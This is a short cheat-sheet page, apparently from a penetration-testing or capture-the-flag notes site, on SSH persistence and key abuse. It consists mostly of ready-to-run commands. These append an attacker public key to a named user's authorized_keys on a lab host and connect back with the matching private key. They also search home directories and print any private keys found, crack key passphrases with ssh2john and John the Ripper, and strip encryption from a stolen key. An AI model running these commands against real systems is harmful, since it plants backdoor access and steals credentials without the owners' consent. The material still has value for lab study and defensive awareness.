Persistence
SSH
Key Injection
Generate SSH Keys
ssh-keygen -t ed25519 -f key
To make sure the execute properly give it restricted permissions:
chmod 600 id_rsa
If
authorized_keys
file doesn't exist create one with your public key:
echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJsqrD2TiYF/KEidiuQncxpjkUU4CDS2A3lmhz1jeHIi b0llull0s@p4n1c" > /home/dvir/.ssh/authorized_keys
Other wise append your public key:
echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJsqrD2TiYF/KEidiuQncxpjkUU4CDS2A3lmhz1jeHIi b0llull0s@p4n1c" >> /home/dvir/.ssh/authorized_keys
Now just connect with your private key:
ssh -i key dvir@10.10.11.8
Using Existing keys
Look for the private key
find /home/user -name "id_*" -exec cat {} \;
Once you find it, just copy the key in your
.ssh
directory and ssh in.Also you can, check If the Corresponding private/public Key is known by using this
repo
.
Crack the passphrase
Use
ssh2john
to generate a hash from the key:
ssh2john private_key > private_key.hash
Then feed this hash into
John the Ripper
:
john private_key.hash --wordlist=/path/to/wordlist
Clone the key
Sometimes you may need to copy an encrypted key to its decrypted version:
openssl rsa -in spanishdancer.key -out ~/keys/ariekei-spanishdancer
Last updated